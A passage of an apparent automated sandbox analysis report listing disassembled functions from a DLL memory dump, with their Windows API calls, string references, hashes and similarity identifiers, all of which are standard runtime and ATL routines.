Instruction ID: db5eb3c90efa079d7c35061f7297640fe8181fb4f375f78e8c18a7b2cd3c2b92
Opcode Fuzzy Hash: 226b51d3a685a37738691e0f47c7c415e21544900bcc10516a4b3994cc710461
Instruction Fuzzy Hash: 9F315C31604748DFEB129B35D844F9AB3E8BF11395F60442EE468DB194DF36F8A48720

Uniqueness

Uniqueness Score: -1.00%

Function 6F18F070, Relevance: 16.9, APIs: 11, Instructions: 353stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6F18EEB0: CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,B5D78B91,00000000,00000000), ref: 6F18EEEE
Part of subcall function 6F18EEB0: CharNextW.USER32(00000000,?,?,00000000), ref: 6F18EF1B
Part of subcall function 6F18EEB0: CharNextW.USER32(770CEEF0,?,?,00000000), ref: 6F18EF34
Part of subcall function 6F18EEB0: CharNextW.USER32(770CEEF0,?,?,00000000), ref: 6F18EF3F
Part of subcall function 6F18EEB0: CharNextW.USER32(00000001,?,?,00000000), ref: 6F18EFAE

lstrcmpiW.KERNEL32(?,6F1C8A28,?,B5D78B91,C000008C,00000000,?,?,00000000,6F1B9BA6,000000FF,?,6F1900F7,00000000,00000000,C000008C), ref: 6F18F0F3
lstrcmpiW.KERNEL32(?,6F1C8A2C,?,6F1900F7,00000000,00000000,C000008C,C000008C), ref: 6F18F10A

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$lstrcmpi
String ID:
API String ID: 3586774192-0
Opcode ID: ccfd84173bfd246da64bacd40923dbae48cfc8a1b9e0095bc6a7e0dfc9b248ec
Instruction ID: ee7e3842d8d077ca2e50007bddb606c3992b2697f9ce62b93b3dac8239128bc9
Opcode Fuzzy Hash: ccfd84173bfd246da64bacd40923dbae48cfc8a1b9e0095bc6a7e0dfc9b248ec
Instruction Fuzzy Hash: D9D1E771900219CBDB25CF24CE48BD9B7B5AF69390F0101DAEA39A7180D734AEB9CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F1ABE31, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 338COMMON

Download Yara Rule

APIs

Part of subcall function 6F1AA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
Part of subcall function 6F1AA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
Part of subcall function 6F1AA294: _abort.LIBCMT ref: 6F1AA342

_memcmp.LIBVCRUNTIME ref: 6F1AC0DB
_free.LIBCMT ref: 6F1AC14C
_free.LIBCMT ref: 6F1AC165
_free.LIBCMT ref: 6F1AC197
_free.LIBCMT ref: 6F1AC1A0
_free.LIBCMT ref: 6F1AC1AC
GetStartupInfoW.KERNEL32(?), ref: 6F1AC209
GetFileType.KERNEL32(?,6F1AB318,?,00000004), ref: 6F1AC272

Strings

C, xrefs: 6F1ABF99

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$FileInfoStartupType_abort_memcmp
String ID: C
API String ID: 1665419104-1037565863
Opcode ID: ddcedde4d16f7026985ede0def991c9b4c6316b19c48e5afd7cd48d93ef614be
Instruction ID: 8c6449602e6189912113404c1f584c7c33c4ba29decc53ccfb6a4f48bd4aa9a8
Opcode Fuzzy Hash: ddcedde4d16f7026985ede0def991c9b4c6316b19c48e5afd7cd48d93ef614be
Instruction Fuzzy Hash: ABD17E79A01219DFDB24DF28C884B9DB7B4FF59394F10459AD949A7390D732AEA0CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6F185570, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6F1855AE
__Getcvt.LIBCPMT ref: 6F1855D3

Strings

true, xrefs: 6F185669
false, xrefs: 6F185630

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Getcvt
String ID: false$true
API String ID: 1921796781-2658103896
Opcode ID: 2765a1df5864eb6b07e56882a932c84e96102db32ce2870b9e961e5ba6904a1e
Instruction ID: 2c51c495e89878311ca65e825f7dab591dbbfa9112e4147507dcd4b20a2e1e0c
Opcode Fuzzy Hash: 2765a1df5864eb6b07e56882a932c84e96102db32ce2870b9e961e5ba6904a1e
Instruction Fuzzy Hash: 32515731A043448FCB14CF68C54079ABBF5EF91364F24819ED8556B385C776B921CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F191130, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 6F191148
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6F191175
MulDiv.KERNEL32(00000008,00000000), ref: 6F19117E
CreateFontW.GDI32(00000000), ref: 6F191187
ReleaseDC.USER32 ref: 6F191194
SetTimer.USER32(?,000003E8,000003E8,00000000), ref: 6F1911A9

Part of subcall function 6F192460: BeginPaint.USER32(?,?), ref: 6F1924A3
Part of subcall function 6F192460: GetParent.USER32(?), ref: 6F1924AC
Part of subcall function 6F192460: GetClientRect.USER32 ref: 6F1924C2
Part of subcall function 6F192460: CreateCompatibleDC.GDI32(?), ref: 6F1924C8
Part of subcall function 6F192460: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6F1924EA
Part of subcall function 6F192460: SelectObject.GDI32(00000000,00000000), ref: 6F1924F6
Part of subcall function 6F192460: SelectObject.GDI32(00000000,?), ref: 6F192508
Part of subcall function 6F192460: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6F192521
Part of subcall function 6F192460: SendMessageW.USER32(?,0000000F,?,00000000), ref: 6F19252F
Part of subcall function 6F192460: SetBkMode.GDI32(?,00000001), ref: 6F192538
Part of subcall function 6F192460: SetTextColor.GDI32(?,00FFFFFF), ref: 6F192544
Part of subcall function 6F192460: GetClientRect.USER32 ref: 6F192556
Part of subcall function 6F192460: ClientToScreen.USER32(?,?), ref: 6F192564
Part of subcall function 6F192460: ClientToScreen.USER32(?,?), ref: 6F192579
Part of subcall function 6F192460: ClientToScreen.USER32(?,?), ref: 6F19259B

DeleteObject.GDI32(?), ref: 6F1911D0

Strings

Arial, xrefs: 6F19114E

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
String ID: Arial
API String ID: 1525433823-493054409
Opcode ID: 5232b613cc721fa38f932f9eb92724713d224db58de4e4c54aad0321bafb64cc
Instruction ID: 6844028683b5565996b56ef7142bc7483cff8c4c283fbfc3a9de121deb6bd87b
Opcode Fuzzy Hash: 5232b613cc721fa38f932f9eb92724713d224db58de4e4c54aad0321bafb64cc
Instruction Fuzzy Hash: 1E31CF71240605EBEB109F28DC85BAA7BA8FF55361F104126F501EA6D0C7B6F8B1CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AA174, Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6F1AA188

Part of subcall function 6F1A9B98: HeapFree.KERNEL32(00000000,00000000,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BAE
Part of subcall function 6F1A9B98: GetLastError.KERNEL32(6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BC0

_free.LIBCMT ref: 6F1AA194
_free.LIBCMT ref: 6F1AA19F
_free.LIBCMT ref: 6F1AA1AA
_free.LIBCMT ref: 6F1AA1B5
_free.LIBCMT ref: 6F1AA1C0
_free.LIBCMT ref: 6F1AA1CB
_free.LIBCMT ref: 6F1AA1D6
_free.LIBCMT ref: 6F1AA1E1
_free.LIBCMT ref: 6F1AA1EF

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 993be65daa29e90a4075f94d8cc16a7a461a7fccb0e66419b36cb62082a65408
Instruction ID: 5ebe894baf528505c89f9aa81da3c78236c5246b1c55f14cf6a1df536f2109c2
Opcode Fuzzy Hash: 993be65daa29e90a4075f94d8cc16a7a461a7fccb0e66419b36cb62082a65408
Instruction Fuzzy Hash: 0611747A51020CFFCB05DF94C951CDD3BA5EF09294B9145A5F9089F2A5DB33EEA09B80

Uniqueness

Uniqueness Score: -1.00%

Function 6F18E310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 100libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,B5D78B91,?,?,?,6F1B9A60,000000FF), ref: 6F18E349
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6F18E359
GetModuleHandleW.KERNEL32(Advapi32.dll,B5D78B91,?,?,?,6F1B9A60,000000FF), ref: 6F18E3B9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6F18E3C9
RegDeleteKeyW.ADVAPI32(?,?), ref: 6F18E418

Strings

Advapi32.dll, xrefs: 6F18E344, 6F18E3B4
RegDeleteKeyExW, xrefs: 6F18E3C3
RegDeleteKeyTransactedW, xrefs: 6F18E353

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: e608a40bf658b8718bc1beb51fef4e1ee8af3ee09d3b83a5d9920827ab8fa436
Instruction ID: d27d8a798ef782c5d6f2f7e8da0cda017a2a1c573cf683cbd051658facf8b711
Opcode Fuzzy Hash: e608a40bf658b8718bc1beb51fef4e1ee8af3ee09d3b83a5d9920827ab8fa436
Instruction Fuzzy Hash: CC31E676608605EFEB118F98D944F95BBB8EB667A0F00412BFD25D3680C736A570CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F19829B, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,6F1985E0,6F1D0D10,C000008C,?,?,6F1930BC,?,B5D78B91,00000000,00000000,6F1B98D0,000000FF), ref: 6F1982AD
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,6F1985E0,6F1D0D10,C000008C,?,?,6F1930BC,?,B5D78B91,00000000,00000000), ref: 6F1982C2
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6F19833E

Strings

AtlThunk_InitData, xrefs: 6F1982EA
AtlThunk_AllocateData, xrefs: 6F1982D3
atlthunk.dll, xrefs: 6F1982BD
AtlThunk_FreeData, xrefs: 6F198318
AtlThunk_DataToCode, xrefs: 6F198301

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: fc4be6e84c195529f5e31e4bce5ad1c7273fdc3a38085a2e22526d23046197bb
Instruction ID: 4654a8ddec7253fa0cb365ded10653a7f119e4558ee925ba147dd1cea5d25ecc
Opcode Fuzzy Hash: fc4be6e84c195529f5e31e4bce5ad1c7273fdc3a38085a2e22526d23046197bb
Instruction Fuzzy Hash: 0001D234809A14BBDA019E388C49FC93B655F127E8F484099FC4476189EB76F33486D6

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B128E, Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e229d7862b27ab5b0121bb4c443981f41ab2c79305d0056674f8c5b65c0287
Instruction ID: 5601e0d1aa9e8017712b860aebe98caa8930fbfa006b1cbe50f2b607274cb563
Opcode Fuzzy Hash: 78e229d7862b27ab5b0121bb4c443981f41ab2c79305d0056674f8c5b65c0287
Instruction Fuzzy Hash: 26C1A074E08349DFDB01DFACC850BEDBBB0AF1A390F154159E954BB291C735A961CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AA294, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
_free.LIBCMT ref: 6F1AA2EF
_free.LIBCMT ref: 6F1AA323
SetLastError.KERNEL32(00000000,?,?,?,00000000,00000008,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA330
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
_abort.LIBCMT ref: 6F1AA342

Strings

ios_base::failbit set, xrefs: 6F1AA296

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID: ios_base::failbit set
API String ID: 3160817290-3924258884
Opcode ID: 41bea25a978a6b845ca48d6dab3e32cffa7a59ed96ed0c818cb0c937ff4f33ab
Instruction ID: c552e7ddf84d366792a097c436e16fc3a36f67c3bddac5f45b8efbd6526484c3
Opcode Fuzzy Hash: 41bea25a978a6b845ca48d6dab3e32cffa7a59ed96ed0c818cb0c937ff4f33ab
Instruction Fuzzy Hash: CC11883D108F01EADA011A799C58E6E3A396FD3BF5B15031AF834D51D8EF27A9319231

Uniqueness

Uniqueness Score: -1.00%

Function 6F1983A7, Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6F198550,00000000), ref: 6F1983CB
HeapAlloc.KERNEL32(00000000), ref: 6F1983D2

Part of subcall function 6F19849D: IsProcessorFeaturePresent.KERNEL32(0000000C,6F1983B9,00000000,?,6F198550,00000000), ref: 6F19849F

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,6F198550,00000000), ref: 6F1983E2
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6F198409
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 6F19841D
InterlockedPopEntrySList.KERNEL32(00000000), ref: 6F198430
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F198443

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 97ee7f1a3d38b556bd64cf968a69acb2bed053475ce1087d0187961a448d3772
Instruction ID: 5ee3ef3385cbe46dd2ab667e61e426347d731e3ed8688114ee1daf52e28a76c6
Opcode Fuzzy Hash: 97ee7f1a3d38b556bd64cf968a69acb2bed053475ce1087d0187961a448d3772
Instruction Fuzzy Hash: 75116071649E21FBEB219A689C88F5A366CFF667F9F410025F905E7140DB60EC304AE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F190AC0, Relevance: 10.8, APIs: 7, Instructions: 267COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6F1D1478,B5D78B91), ref: 6F190B1D
GetModuleFileNameW.KERNEL32(?,00000104), ref: 6F190BA4
LoadTypeLib.OLEAUT32(?,00000000), ref: 6F190BD5
LoadRegTypeLib.OLEAUT32(6F1C9538,00000000,00000000,?,00000000), ref: 6F190BFD
EnterCriticalSection.KERNEL32(6F1D1494), ref: 6F190DC0
LeaveCriticalSection.KERNEL32(6F1D1494), ref: 6F190DD6

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
String ID:
API String ID: 1976781235-0
Opcode ID: 295365bf6f5312ce389ca5c2e03b45d3f25f62a28dd3af7c370d0595aec800a2
Instruction ID: 9497d85e44b021e2e39d2a1bc029a836d57662224c16b92eac56b6b5198a901b
Opcode Fuzzy Hash: 295365bf6f5312ce389ca5c2e03b45d3f25f62a28dd3af7c370d0595aec800a2
Instruction Fuzzy Hash: 29B17D75901618EFDB10CB64C888B9ABBF4EF5A394F1051D9E809EB240D735EE64CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F193DA0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6F180000,?,00000104), ref: 6F193E7D
GetModuleHandleW.KERNEL32(00000000), ref: 6F193EF7

Strings

APPID, xrefs: 6F193E3D
Module, xrefs: 6F193FA2
Module_Raw, xrefs: 6F193FD3
REGISTRY, xrefs: 6F194030

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: bc2b8d0563ca841d1ee98681e7b36e3be7eef75f29b3b98b45dbf786667f8183
Instruction ID: aa049f4ce6f97ebe62ce751f27b0d468213163103abc82556c07d71ae13b51b3
Opcode Fuzzy Hash: bc2b8d0563ca841d1ee98681e7b36e3be7eef75f29b3b98b45dbf786667f8183
Instruction Fuzzy Hash: BC711735A006188BDB24CF54CD51BEA7378BF55798F0002ADD81EA7680EB756E65CFC2

Uniqueness

Uniqueness Score: -1.00%

Function 6F1903B0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6F180000,?,00000104), ref: 6F19048D
GetModuleHandleW.KERNEL32(00000000), ref: 6F190507

Strings

APPID, xrefs: 6F19044D
Module, xrefs: 6F1905B2
Module_Raw, xrefs: 6F1905DF
REGISTRY, xrefs: 6F19063D

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 58a3aafd7b704515b54ff9a02b6898aa3406cac8f334e4b1c384878737b58681
Instruction ID: c9c34b33127c0ff1dea477fc2bfba78d3a57b6208d09d3896d0cf308e0d0c043
Opcode Fuzzy Hash: 58a3aafd7b704515b54ff9a02b6898aa3406cac8f334e4b1c384878737b58681
Instruction Fuzzy Hash: 3561D5359006188BDB24CF60CD90BEE7374BF65794F0012ADD81AA7580DB756EA4CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AFABC, Relevance: 10.7, APIs: 7, Instructions: 160fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,6F1B024E,?,?,?,?,?), ref: 6F1AFAFE
__fassign.LIBCMT ref: 6F1AFB80
__fassign.LIBCMT ref: 6F1AFB9F
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6F1AFBCC
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6F1B024E), ref: 6F1AFBEB
WriteFile.KERNEL32(?,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6F1B024E), ref: 6F1AFC24

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 506a49a861609033c8e032f701d2eaadc567ba6eefb8df806210f6700b635715
Instruction ID: 9858d1a1a503aebbb65d3e55fbbedaa5ae2c82bc6d983c02cda27a2d1d54668b
Opcode Fuzzy Hash: 506a49a861609033c8e032f701d2eaadc567ba6eefb8df806210f6700b635715
Instruction Fuzzy Hash: 8C51B174E042499FDB10CFA8D890AEEBBF8FF09350F14411BE965E7281D732A961CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F199350, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6F19937B
___except_validate_context_record.LIBVCRUNTIME ref: 6F199383
_ValidateLocalCookies.LIBCMT ref: 6F199411
__IsNonwritableInCurrentImage.LIBCMT ref: 6F19943C
_ValidateLocalCookies.LIBCMT ref: 6F199491

Strings

csm, xrefs: 6F199426

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: bbc16b227044256cdcca478b6d2d83c7138abe16693b05c848aa8fad05f09d3d
Instruction ID: 870b017c02307f06a3a1e0cf6c7d44623274f511f8ca1015f8ed21964fe74c1a
Opcode Fuzzy Hash: bbc16b227044256cdcca478b6d2d83c7138abe16693b05c848aa8fad05f09d3d
Instruction Fuzzy Hash: B441A334A00209EFCF10CF69C894A9EBBB5BF553A8F408159E8245B295D735FA25CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6F198680, Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,B5D78B91,?,00000000,?,00000000,8007000E), ref: 6F1986F3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6F19872A

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 375cf946a8dae1d6cd78ffd45302cfb4dc9a34ff7b7c0b84ba625a2833d2bb4b
Instruction ID: 77ee6802cac44e6757c8c60f0eeeda743d384438f96843bf9c36437afea1d2a4
Opcode Fuzzy Hash: 375cf946a8dae1d6cd78ffd45302cfb4dc9a34ff7b7c0b84ba625a2833d2bb4b
Instruction Fuzzy Hash: 9C314976A44308ABD710CF648C45FAB77B8FB40BB4F10412AF915EA2C0D732B520C6E5

Uniqueness

Uniqueness Score: -1.00%

Function 6F193380, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 6F193410
GetWindowLongW.USER32(?,000000FC), ref: 6F193424
CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 6F19343A
GetWindowLongW.USER32(?,000000FC), ref: 6F193453
SetWindowLongW.USER32 ref: 6F193462

Strings

$, xrefs: 6F1933C4

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 370f469243fdc644578e22a84cb31ed7ea75a184ad0bffbac18fa10cd7c2a69c
Instruction ID: 8bccaa79c7ef7b9b190069e351fa9a28e20a81cbad407892e67d85e38be5428c
Opcode Fuzzy Hash: 370f469243fdc644578e22a84cb31ed7ea75a184ad0bffbac18fa10cd7c2a69c
Instruction Fuzzy Hash: 2C412A71900608EFCB11CF99C885A9FBBF5FF58750F10861DE86AA76A0D731A924CF90

Uniqueness

Uniqueness Score: -1.00%

